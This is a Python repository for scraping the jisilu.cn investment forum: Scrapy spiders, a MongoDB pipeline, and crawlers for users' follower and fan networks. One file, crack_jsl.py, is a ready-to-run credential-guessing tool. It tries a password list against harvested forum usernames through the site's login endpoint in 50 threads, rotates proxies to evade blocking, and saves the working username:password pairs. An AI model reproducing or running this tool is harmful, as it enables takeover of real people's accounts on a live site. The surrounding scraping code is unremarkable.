 67 | #    'scrapy.extensions.telnet.TelnetConsole': None,
 68 | #}
 69 | 
 70 | # Configure item pipelines
 71 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
 72 | ITEM_PIPELINES = {
 73 |    # 'jsl.pipelines.ElasticPipeline': 300,
 74 |     'jsl.pipelines.JslPipeline':300,
 75 | # 'scrapyelasticsearch.scrapyelasticsearch.ElasticSearchPipeline':200,
 76 | }
 77 | 
 78 | # Enable and configure the AutoThrottle extension (disabled by default)
 79 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html
 80 | #AUTOTHROTTLE_ENABLED = True
 81 | # The initial download delay
 82 | #AUTOTHROTTLE_START_DELAY = 5
 83 | # The maximum download delay to be set in case of high latencies
 84 | #AUTOTHROTTLE_MAX_DELAY = 60
 85 | # The average number of requests Scrapy should be sending in parallel to
 86 | # each remote server
 87 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
 88 | # Enable showing throttling stats for every response received:
 89 | #AUTOTHROTTLE_DEBUG = False
 90 | 
 91 | # Enable and configure HTTP caching (disabled by default)
 92 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
 93 | #HTTPCACHE_ENABLED = True
 94 | #HTTPCACHE_EXPIRATION_SECS = 0
 95 | #HTTPCACHE_DIR = 'httpcache'
 96 | #HTTPCACHE_IGNORE_HTTP_CODES = []
 97 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
 98 | 
 99 | ELASTICSEARCH_SERVERS = ['10.18.6.102:9200']
100 | ELASTICSEARCH_INDEX='jsl_elastic'
101 | ELASTICSEARCH_TYPE='ticket'
102 | 


--------------------------------------------------------------------------------
/jsl/pipelines.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | # Define your item pipelines here
  4 | #
  5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting
  6 | # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
  7 | import datetime
  8 | import logging
  9 | 
 10 | import pymongo
 11 | from collections import OrderedDict
 12 | from scrapy.exporters import JsonLinesItemExporter
 13 | from jsl.items import Relationship, JslItem
 14 | from jsl import config
 15 | 
 16 | 
 17 | class JslPipeline(object):
 18 | 
 19 |     def __init__(self):
 20 |         connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
 21 |         self.db = pymongo.MongoClient(connect_uri)
 22 |         # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ，然后找到用户的id，在用户也的源码哪里可以找到 比如持有封基是8132
 23 |         # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test']
 24 |         self.collection = self.db['db_parker'][config.doc_name]
 25 |         self.relations = self.db['db_parker']['jsl_relationship']
 26 |         try:
 27 |             self.collection.ensure_index('question_id', unique=True)
 28 |         except Exception as e:
 29 |             pass
 30 | 
 31 |     def process_item(self, item, spider):
 32 | 
 33 |         if isinstance(item, JslItem):
 34 |             update_time = datetime.datetime.now()
 35 |             item = dict(item)
 36 |             item['update_time'] = update_time
 37 | 
 38 | 
 39 |             if self.collection.find_one({'question_id': item['question_id']},{'_id':1}):
 40 |                 # 更新评论部分, 不更新就退出
 41 |                 only_add = False
 42 | 
 43 |                 try:
 44 |                     only_add = item['only_add']
 45 | 
 46 |                 except Exception as e:
 47 |                     pass
 48 | 
 49 |                 if not only_add:
 50 |                     resp_no = self.collection.find_one({'question_id': item['question_id']},{'resp_no':1})
 51 |                     resp_no_num = resp_no.get('resp_no')
 52 | 
 53 |                     if resp_no_num<item['resp_no']:
 54 | 
 55 |                         print('最新的评论数多于数据库，更新')
 56 |                         try:
 57 |                             self.collection.update_one({'question_id': item['question_id']},
 58 |                                                        {'$set':
 59 |                                                             {'resp': item['resp'],
 60 |                                                              'resp_no':item['resp_no'],
 61 |                                                              'last_resp_date': item['last_resp_date'],
 62 |                                                              'update_time': update_time
 63 |                                                              },
 64 | 
 65 |                                                         }
 66 |                                                        )
 67 |                         except Exception as e:
 68 |                             logging.error(e)
 69 |                         else:
 70 |                             print('更新完毕')
 71 | 
 72 |                     else:
 73 |                         print('已有评论数目一样，跳过')
 74 | 
 75 | 
 76 |             else:
 77 |                 # 直接新增
 78 |                 try:
 79 |                     print('新增{}'.format(item['question_id']))
 80 |                     self.collection.insert_one(item)
 81 |                 except Exception as e:
 82 |                     logging.error(e)
 83 | 
 84 |         elif isinstance(item, Relationship):  # 这里会比较复杂
 85 | 
 86 |             # 存在
 87 |             if list(self.relations.find({'user_id': item['user_id']},{'_id':1})):
 88 |                 if item['flag'] == 'follow':  # 粉丝
 89 |                     follows_list = item['follows_list']
 90 |                     for follower in follows_list:
 91 |                         self.relations.update({'user_id': item['user_id']}, {'$push': {'follows_list': follower}})
 92 |                 else:  # 关注他人
 93 |                     fans_list = item['fans_list']
 94 |                     for fan in fans_list:
 95 |                         self.relations.update({'user_id': item['user_id']}, {'$push': {'fans_list': fan}})
 96 | 
 97 |             # 不存在
 98 |             else:
 99 |                 d = dict(item)
100 |                 del d['flag']
101 |                 self.relations.insert(d)
102 | 
103 |         return item
104 | 
105 | 
106 | class ElasticPipeline(object):
107 |     def __init__(self):
108 |         self.fp = open('jsl.json', 'wb')
109 |         self.exporter = JsonLinesItemExporter(self.fp, ensure_ascii=False, encoding='utf8')
110 | 
111 |     def open_spider(self, spider):
112 |         print('开始爬虫了')
113 | 
114 |     def process_item(self, item, spider):
115 |         print('处理item')
116 |         self.exporter.export_item(item)
117 | 
118 |     def close_spider(self, spider):
119 |         self.fp.close()
120 |         print('爬虫结束')
121 | 
122 | 


--------------------------------------------------------------------------------
/jsl/spiders/relationship.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | # website: http://30daydo.com
  3 | # @Time : 2019/5/12 20:11
  4 | # @File : relationship.py
  5 | import datetime
  6 | import re
  7 | 
  8 | import math
  9 | # from scrapy.linkextractors import LinkExtractor
 10 | 
 11 | from scrapy import Spider, Request
 12 | from jsl.items import Relationship
 13 | 
 14 | 
 15 | class RelationshipSpider(Spider):
 16 |     name = 'relation'
 17 |     headers = {
 18 |         'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
 19 |         'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
 20 |         'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
 21 |         'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
 22 |         'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
 23 |         'Referer': 'https://www.jisilu.cn/login/',
 24 |         'Accept-Encoding': 'gzip,deflate,br',
 25 |         'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
 26 |     }
 27 | 
 28 |     people_url = 'https://www.jisilu.cn/people/{name}'
 29 |     follow_url = 'https://www.jisilu.cn/people/ajax/follows/type-follows__uid-{user_id}__page-{page}' # 关注的人
 30 |     fan_url = 'https://www.jisilu.cn/people/ajax/follows/type-fans__uid-{user_id}__page-{page}' # 粉丝
 31 | 
 32 |     def start_requests(self):
 33 |         start_user = '帅牛'
 34 | 
 35 |         yield Request(
 36 |             url=self.people_url.format(name=start_user),
 37 |             headers=self.headers,
 38 |             meta={'user': start_user},
 39 |             callback=self.parse_user
 40 |         )
 41 | 
 42 |     def parse_user(self, response):
 43 | 
 44 |         item = Relationship()
 45 | 
 46 |         user = response.meta['user']
 47 | 
 48 |         follows_num = int(
 49 |             response.xpath('//div[@class="pull-left aw-user-center-follow-mini-mod"][1]/b/em/text()').extract_first())
 50 |         fans_num = int(
 51 |             response.xpath('//div[@class="pull-left aw-user-center-follow-mini-mod"][2]/b/em/text()').extract_first())
 52 | 
 53 |         prestige = int(response.xpath('//i[@class="aw-icon i-user-prestige"]/following::*[1]/text()').extract_first())
 54 |         approve = int(response.xpath('//i[@class="aw-icon i-user-approve"]/following::*[1]/text()').extract_first())
 55 | 
 56 |         user_id = re.search('var PEOPLE_USER_ID = \'(\d+)\';', response.text)
 57 | 
 58 |         if user_id:
 59 |             user_id = user_id.group(1)
 60 | 
 61 |         item['user'] = user
 62 |         item['user_id'] = user_id
 63 |         item['follows_count'] = follows_num
 64 |         item['fans_count'] = fans_num
 65 | 
 66 |         item['approve'] = approve
 67 |         item['prestige'] = prestige
 68 | 
 69 |         follows_pages = int(math.ceil(follows_num / 30))
 70 |         fans_pages = int(math.ceil(fans_num / 30))
 71 |         for follow_page in range(follows_pages):
 72 |             yield Request(
 73 |                 url=self.follow_url.format(user_id=user_id, page=follow_page),
 74 |                 headers=self.headers,
 75 |                 callback=self.follow_item,
 76 |                 meta={'item': item.copy()}
 77 |             )
 78 | 
 79 |         for fan_page in range(fans_pages):
 80 |             yield Request(
 81 |                 url=self.fan_url.format(user_id=user_id, page=fan_page),
 82 |                 headers=self.headers,
 83 |                 callback=self.fan_item,
 84 |                 meta={'item': item.copy()}
 85 |             )
 86 | 
 87 |     def follow_item(self, response):
 88 |         item = response.meta['item']
 89 |         item['flag'] = 'follow'
 90 | 
 91 |         follow_list = []
 92 |         for node in response.xpath('//li[@class="span5"]'):
 93 |             d = {}
 94 |             follower_name = node.xpath('.//div[@class="aw-item"]/p[1]/a/text()').extract_first()
 95 |             prestige = int(node.xpath('.//i[@class="aw-icon i-user-prestige"]/following::*[1]/text()').extract_first())
 96 |             approve = int(node.xpath('.//i[@class="aw-icon i-user-approve"]/following::*[1]/text()').extract_first())
 97 |             d['follow_name'] = follower_name
 98 |             d['prestige'] = prestige
 99 |             d['approve'] = approve
100 |             follow_list.append(d)
101 | 
102 |             yield Request(
103 |                 url=self.people_url.format(name=follower_name),
104 |                 headers=self.headers,
105 |                 meta={'user': follower_name},
106 |                 callback=self.parse_user
107 |             )
108 | 
109 |         item['follows_list'] = follow_list
110 |         item['crawltime'] = datetime.datetime.now()
111 |         yield item
112 | 
113 |     def fan_item(self, response):
114 | 
115 |         item = response.meta['item']
116 |         item['flag'] = 'fan'
117 | 
118 |         follow_list = []
119 | 
120 |         for node in response.xpath('//li[@class="span5"]'):
121 |             d = {}
122 |             fan_name = node.xpath('.//div[@class="aw-item"]/p[1]/a/text()').extract_first()
123 |             prestige = int(node.xpath('.//i[@class="aw-icon i-user-prestige"]/following::*[1]/text()').extract_first())
124 |             approve = int(node.xpath('.//i[@class="aw-icon i-user-approve"]/following::* [1]/text()').extract_first())
125 | 
126 |             d['fan_name'] = fan_name
127 |             d['prestige'] = prestige
128 |             d['approve'] = approve
129 | 
130 |             yield Request(
131 |                 url=self.people_url.format(name=fan_name),
132 |                 headers=self.headers,
133 |                 meta={'user': fan_name},
134 |                 callback=self.parse_user
135 |             )
136 | 
137 |             follow_list.append(d)
138 | 
139 |         item['fans_list'] = follow_list
140 |         item['crawltime'] = datetime.datetime.now()
141 |         yield item
142 | 


--------------------------------------------------------------------------------
/crack_jsl.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | # website: http://30daydo.com
  3 | # @Time : 2020/9/5 22:41
  4 | # @File : crack_jsl.py
  5 | import codecs
  6 | import json
  7 | import threading
  8 | import requests
  9 | import time
 10 | from loguru import logger
 11 | import redis
 12 | 
 13 | THREAD_NUM =50
 14 | logger.add('crack.log')
 15 | 
 16 | 
 17 | class CrackSpider():
 18 | 
 19 |     def __init__(self, *args, **kwargs):
 20 |         super(CrackSpider, self).__init__(*args, **kwargs)
 21 |         # host = _json_data['mongo']['qq']['host']
 22 |         # port = _json_data['mongo']['qq']['port']
 23 |         # self.doc = pymongo.MongoClient(host=host, port=port)
 24 | 
 25 |         filename = 'creator.txt'
 26 |         with codecs.open(filename, 'r', encoding='utf8') as f:
 27 |             conent = f.readlines()
 28 |             self.content = list(map(lambda x: x.strip(), conent))
 29 | 
 30 |         self.url = 'https://www.jisilu.cn/account/ajax/login_process/'
 31 |         self.data = {
 32 |             'return_url': 'https://www.jisilu.cn/',
 33 |             'user_name': '',
 34 |             'password': '',
 35 |             'net_auto_login': '1',
 36 |             '_post_type': 'ajax',
 37 |         }
 38 |         self.headers = {
 39 |             'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
 40 |             'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
 41 |             'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
 42 |             'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
 43 |             'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
 44 |             'Referer': 'https://www.jisilu.cn/login/',
 45 |             'Accept-Encoding': 'gzip,deflate,br',
 46 |             'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
 47 |         }
 48 | 
 49 |         with open('password.txt', 'r') as f:
 50 |             password_list = f.readlines()
 51 |             self.password_list = list(map(lambda x: x.strip(), password_list))
 52 | 
 53 |         self.proxy_url = config_.proxy
 54 |         self.__redis = redis.StrictRedis(host=config_.redis_host, password=config_.redis_password)
 55 | 
 56 |     def parse_user(self,i):
 57 |         logger.info(f'in thread {i}')
 58 |         user = True
 59 |         while user:
 60 |             user = self.content.pop()
 61 |             for password in self.password_list:
 62 |                 data = self.data.copy()
 63 |                 if self.__redis.sismember('username_run', user):
 64 |                     continue
 65 | 
 66 |                 data['user_name'] = user
 67 |                 data['password'] = password
 68 |                 # print(password)
 69 |                 proxy = self.get_proxy()
 70 |                 # print(proxy)
 71 |                 try:
 72 |                     r = requests.post(
 73 |                     url=self.url,
 74 |                     headers=self.headers,
 75 |                     data=data,
 76 |                     proxies=proxy,
 77 |                     cookies=None,
 78 |                     # verify=False
 79 |                 )
 80 |                 except Exception as e:
 81 |                     logger.error(e)
 82 |                     proxy = self.get_proxy()
 83 |                     # print(proxy)
 84 |                     try:
 85 |                         r = requests.post(
 86 |                             url=self.url,
 87 |                             headers=self.headers,
 88 |                             data=data,
 89 |                             proxies=proxy,
 90 |                             cookies=None,
 91 |                             # verify=False
 92 |                         )
 93 |                     except:
 94 |                         pass
 95 |                     else:
 96 |                         self.parse_data(r, user, password)
 97 |                 else:
 98 |                     self.parse_data(r,user,password)
 99 | 
100 | 
101 | 
102 |     def run(self):
103 | 
104 |         thread_list =[]
105 |         for i in range(THREAD_NUM):
106 |             t = threading.Thread(target=self.parse_user,args=(i,))
107 |             thread_list.append(t)
108 | 
109 |         for t in thread_list:
110 |             t.start()
111 | 
112 |         for t in thread_list:
113 |             t.join()
114 | 
115 |     def get_proxy(self):
116 |         proxyurl = 'http://{}:8101/dynamicIp/common/getDynamicIp.do'.format(self.proxy_url)
117 |         count = 0
118 |         for i in range(3):
119 |             try:
120 |                 r = requests.get(proxyurl, timeout=10)
121 |             except Exception as e:
122 |                 print(e)
123 |                 count += 1
124 |                 print('代理获取失败,重试' + str(count))
125 |                 time.sleep(1)
126 | 
127 |             else:
128 |                 js = r.json()
129 |                 proxyServer = 'http://{0}:{1}'.format(js.get('ip'), js.get('port'))
130 |                 proxyServers = 'https://{0}:{1}'.format(js.get('ip'), js.get('port'))
131 |                 proxies_random = {
132 |                     'http': proxyServer,
133 |                     'https': proxyServers
134 |                 }
135 |                 return proxies_random
136 | 
137 |         return None
138 | 
139 |     def parse_data(self, response,user,password):
140 |         # print(response.text)
141 |         js_data = json.loads(response.text)
142 |         errno = js_data.get('errno')
143 | 
144 |         # print('Done')
145 |         if errno != -1:
146 |             logger.info(js_data)
147 |             logger.info('*********')
148 |             logger.info('user==>', user)
149 |             logger.info('password==>', password)
150 |             with open('find.txt','a') as f:
151 |                 f.write(f'{user}:{password}')
152 |         if js_data.get('err','')=='用户名或口令无效':
153 |             print('无效，入redis')
154 |             self.__redis.sadd('username_run',user)
155 | 
156 | if __name__ == '__main__':
157 |     spider = CrackSpider()
158 |     spider.run()
159 | 


--------------------------------------------------------------------------------
/jsl/spiders/questions_loop.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import re
  3 | import scrapy
  4 | from scrapy import Request, FormRequest
  5 | from jsl.items import JslItem
  6 | from jsl import config
  7 | import logging
  8 | 
  9 | LASTEST_ID = config.LASTEST_ID  # 394716
 10 | 
 11 | 
 12 | # 遍历所有questions id 看从哪里开始
 13 | class AllcontentSpider(scrapy.Spider):
 14 |     name = 'questions_loop'
 15 | 
 16 |     headers = {
 17 |         'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
 18 |         'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
 19 |         'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
 20 |         'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
 21 |         'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
 22 |         'Referer': 'https://www.jisilu.cn/login/',
 23 |         'Accept-Encoding': 'gzip,deflate,br',
 24 |         'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
 25 |     }
 26 | 
 27 |     def start_requests(self):
 28 |         login_url = 'https://www.jisilu.cn/login/'
 29 |         headers = {
 30 |             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
 31 |             'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
 32 |             'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
 33 |             'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
 34 |             'Upgrade-Insecure-Requests': '1',
 35 |             'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
 36 | 
 37 |         yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True)
 38 | 
 39 |     def login(self, response):
 40 |         url = 'https://www.jisilu.cn/account/ajax/login_process/'
 41 |         data = {
 42 |             'return_url': 'https://www.jisilu.cn/',
 43 |             'user_name': config.jsl_user,
 44 |             'password': config.jsl_password,
 45 |             'net_auto_login': '1',
 46 |             '_post_type': 'ajax',
 47 |         }
 48 | 
 49 |         yield FormRequest(
 50 |             url=url,
 51 |             headers=self.headers,
 52 |             formdata=data,
 53 |             callback=self.parse_,
 54 |         )
 55 | 
 56 |     def parse_(self, response):
 57 |         print(response.text)
 58 |         start_page = LASTEST_ID
 59 | 
 60 |         focus_url = 'https://www.jisilu.cn/question/{}'.format(start_page)
 61 |         yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': start_page, 'dont_redirect': True,},
 62 |                       dont_filter=True)
 63 | 
 64 |     def parse_item(self, response):
 65 |         question_id_ = response.meta['question_id']
 66 | 
 67 |         if '问题不存在或已被删除' in response.text:
 68 |             question_id = question_id_ - 1
 69 |             if question_id>1:
 70 |                 focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id)
 71 | 
 72 |                 yield Request(url=focus_url, headers=self.headers, callback=self.parse_item,
 73 |                               meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True)
 74 | 
 75 |         else:
 76 | 
 77 |             question_id = question_id_ - 1
 78 |             print(question_id)
 79 |             if question_id > 1:
 80 |                 focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id)
 81 | 
 82 |                 yield Request(url=focus_url, headers=self.headers, callback=self.parse_item,
 83 |                               meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True)
 84 | 
 85 | 
 86 |             item = JslItem()
 87 | 
 88 |             title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
 89 |             s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
 90 | 
 91 |             if s:
 92 |                 ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
 93 |             else:
 94 |                 ret = None
 95 | 
 96 |             try:
 97 |                 content = ret[0].strip()
 98 |             except:
 99 |                 content = None
100 | 
101 |             createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
102 | 
103 |             resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
104 | 
105 |             url = response.url
106 | 
107 |             # 添加发起人
108 |             try:
109 |                 item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
110 |             except Exception as e:
111 |                 print(e)
112 |                 item['creator'] = None
113 |             try:
114 |                 item['title'] = title.strip()
115 |             except Exception as e:
116 |                 item['title']=None
117 |             item['content'] = content
118 | 
119 |             if resp_no is None:
120 |                 resp_no = 0
121 |             # try:
122 |             #     item['resp_no'] = int(resp_no)
123 |             # except Exception as e:
124 |             #     logging.warning(e)
125 |             #     logging.warning('没有回复')
126 |             #     item['resp_no'] = None
127 |             item['only_add'] = True
128 |             item['resp_no'] = int(resp_no)
129 |             item['question_id'] = question_id_
130 |             createTime = createTime.strip()
131 |             if not re.search('^\d', createTime):
132 |                 createTime = createTime.replace('发表时间 ', '')
133 |                 # createTime = None
134 |                 # self.logger.error('创建日期有误:{}'.format(url))
135 |             if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime):
136 |                 self.logger.error('创建日期有误:{}'.format(url))
137 |                 self.logger.error(createTime)
138 |                 createTime = None
139 |             #
140 |             item['createTime'] = createTime
141 |             item['url'] = url.strip()
142 |             resp = []
143 |             last_resp_date = None
144 |             for index, reply in enumerate(
145 |                     response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
146 |                 replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
147 | 
148 |                 if last_resp_date is None:
149 |                     last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
150 | 
151 |                 rep_content = reply.xpath(
152 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
153 |                 # print rep_content
154 |                 agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
155 |                 try:
156 |                     int(agree)
157 |                 except:
158 |                     agree = 0
159 | 
160 |                 resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]})
161 | 
162 |             item['resp'] = resp
163 |             item['last_resp_date'] = last_resp_date
164 | 
165 |             yield item
166 | 
167 | 


--------------------------------------------------------------------------------
/jsl/spiders/jisilu_user_content.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import datetime
  3 | import logging
  4 | import re
  5 | import scrapy
  6 | from jsl.items import JslItem
  7 | from jsl import config
  8 | from jsl.spiders.aes_encode import decoder
  9 | from scrapy import Request,FormRequest
 10 | # 获取某个用户的所有帖子，主要为了慎防大v要删帖，快速下载
 11 | 
 12 | class JisiluSpider(scrapy.Spider):
 13 |     name = 'single_user'
 14 |     DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
 15 |     MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
 16 | 
 17 |     def __init__(self):
 18 |         super(JisiluSpider,self).__init__()
 19 | 
 20 |         self.headers = {
 21 |                         'Accept-Language': ' zh-CN,zh;q=0.9', 'Accept-Encoding': ' gzip, deflate, br',
 22 |                         'X-Requested-With': ' XMLHttpRequest', 'Host': ' www.jisilu.cn', 'Accept': ' */*',
 23 |                         'User-Agent': ' Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36',
 24 |                         'Connection': ' keep-alive',
 25 |                         'Pragma': ' no-cache', 'Cache-Control': ' no-cache',
 26 |                         'Referer': ' https://www.jisilu.cn/people/dbwolf'
 27 |                         }
 28 | 
 29 |         # self.uid = '83220'  # 这个id需要在源码页面里面去找
 30 |         self.uid = config.uid
 31 | 
 32 |         self.list_url =  'https://www.jisilu.cn/people/ajax/user_actions/uid-{}__actions-101__page-{}'
 33 | 
 34 | 
 35 |     def start_requests(self):
 36 | 
 37 |         login_url = 'https://www.jisilu.cn/login/'
 38 |         headersx = {
 39 |             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
 40 |             'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
 41 |             'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
 42 |             'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
 43 |             'Upgrade-Insecure-Requests': '1',
 44 |             'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
 45 | 
 46 |         yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
 47 | 
 48 |     def login(self, response):
 49 |         url = 'https://www.jisilu.cn/account/ajax/login_process/'
 50 |         username = decoder(config.jsl_user)
 51 |         jsl_password = decoder(config.jsl_password)
 52 |         data = {
 53 |             'return_url': 'https://www.jisilu.cn/',
 54 |             'user_name': username,
 55 |             'password': jsl_password,
 56 |             'net_auto_login': '1',
 57 |             '_post_type': 'ajax',
 58 |         }
 59 | 
 60 |         yield FormRequest(
 61 |             url=url,
 62 |             headers=self.headers,
 63 |             formdata=data,
 64 |             callback=self.start_fetch_user,
 65 |             dont_filter=True,
 66 | 
 67 |         )
 68 | 
 69 | 
 70 |     def start_fetch_user(self,response):
 71 |         current_page=0
 72 |         yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse)
 73 | 
 74 |     def parse(self, response,**kwargs):
 75 |         current_page = response.meta['current_page']
 76 |         link_list = response.xpath('//body/div[@class="aw-item"]')
 77 |         if link_list is None:
 78 |             return
 79 | 
 80 |         for link in link_list:
 81 |             link_=link.xpath('.//div[@class="aw-mod"]/div[@class="aw-mod-head"]/h4/a/@href').extract_first()
 82 |             match = re.search('/question/(\d+)',link_)
 83 |             if match:
 84 |                 question_id = match.group(1)
 85 |                 yield scrapy.Request(self.DETAIL_URL.format(question_id),
 86 |                                      headers=self.headers,
 87 |                                      callback=self.parse_item,
 88 |                                      meta={'question_id':question_id})
 89 | 
 90 |         current_page=current_page+1
 91 |         yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse)
 92 | 
 93 | 
 94 |     def check_detail(self,response,**kwargs):
 95 | 
 96 |         if '您访问的资源需要购买会员' in response.text:
 97 |             return
 98 | 
 99 |         question_id = response.meta['question_id']
100 |         more_page = response.xpath('//div[@class="pagination pull-right"]')
101 | 
102 |         item = JslItem()
103 |         title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
104 |         s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
105 |         ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
106 |         item['question_id'] = question_id
107 | 
108 |         try:
109 |             content = ret[0].strip()
110 |         except Exception as e:
111 |             logging.error(e)
112 |             content = None
113 | 
114 |         createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
115 |         # 'aw-question-detail-meta'
116 |         resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
117 | 
118 |         url = response.url
119 | 
120 |         # 添加发起人
121 |         try:
122 |             item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
123 |         except Exception as e:
124 |             logging.error(e)
125 |             item['creator'] = None
126 | 
127 |         item['title'] = title.strip()
128 |         item['content'] = content
129 |         try:
130 |             item['resp_no'] = int(resp_no)
131 |         except Exception as e:
132 |             # logging.warning('没有回复')
133 |             item['resp_no'] = 0
134 | 
135 |         item['createTime'] = createTime.replace('发表时间 ', '')
136 |         item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
137 |         item['url'] = url.strip()
138 |         # item['html'] = response.text
139 |         # item['last_resp_date'] = response.meta['last_resp_date']
140 | 
141 |         # 多页
142 |         if more_page:
143 | 
144 |             total_resp_no = item['resp_no']
145 |             total_page = total_resp_no // 100 + 1
146 |             item['resp'] = []
147 | 
148 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
149 |                           callback=self.multi_page_detail,
150 |                           meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
151 |                                 'item': item})
152 | 
153 |         else:
154 | 
155 |             resp_ = []
156 |             # 回复内容
157 |             resp_time_list = []
158 |             for index, reply in enumerate(
159 |                     response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
160 |                 replay_user = reply.xpath(
161 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
162 |                 rep_content = reply.xpath(
163 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
164 |                     'string(.)').extract_first()
165 | 
166 |                 # 注意这里为了从用户初采集，加了这个字段
167 |                 rep_time = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
168 |                 resp_time_list.append(rep_time)
